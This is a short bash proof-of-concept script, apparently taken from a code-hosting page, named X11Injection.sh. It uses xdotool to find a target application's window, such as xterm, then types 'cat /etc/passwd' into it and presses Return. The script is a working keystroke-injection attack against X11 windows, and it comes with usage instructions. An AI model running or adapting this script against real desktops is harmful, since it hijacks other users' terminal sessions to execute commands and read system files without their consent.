You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
|
#!/bin/bash
|
|
|
|
## howto: enter the name of target application as argument
|
|
## e.g.
|
|
## ./X11Injection.sh xterm
|
|
|
|
windowid=$(xdotool search --class $1)
|
|
xdotool windowactivate --sync $windowid type --delay 100 'cat /etc/passwd'
|
|
xdotool windowactivate --sync $windowid key --delay 100 Return
|
|
|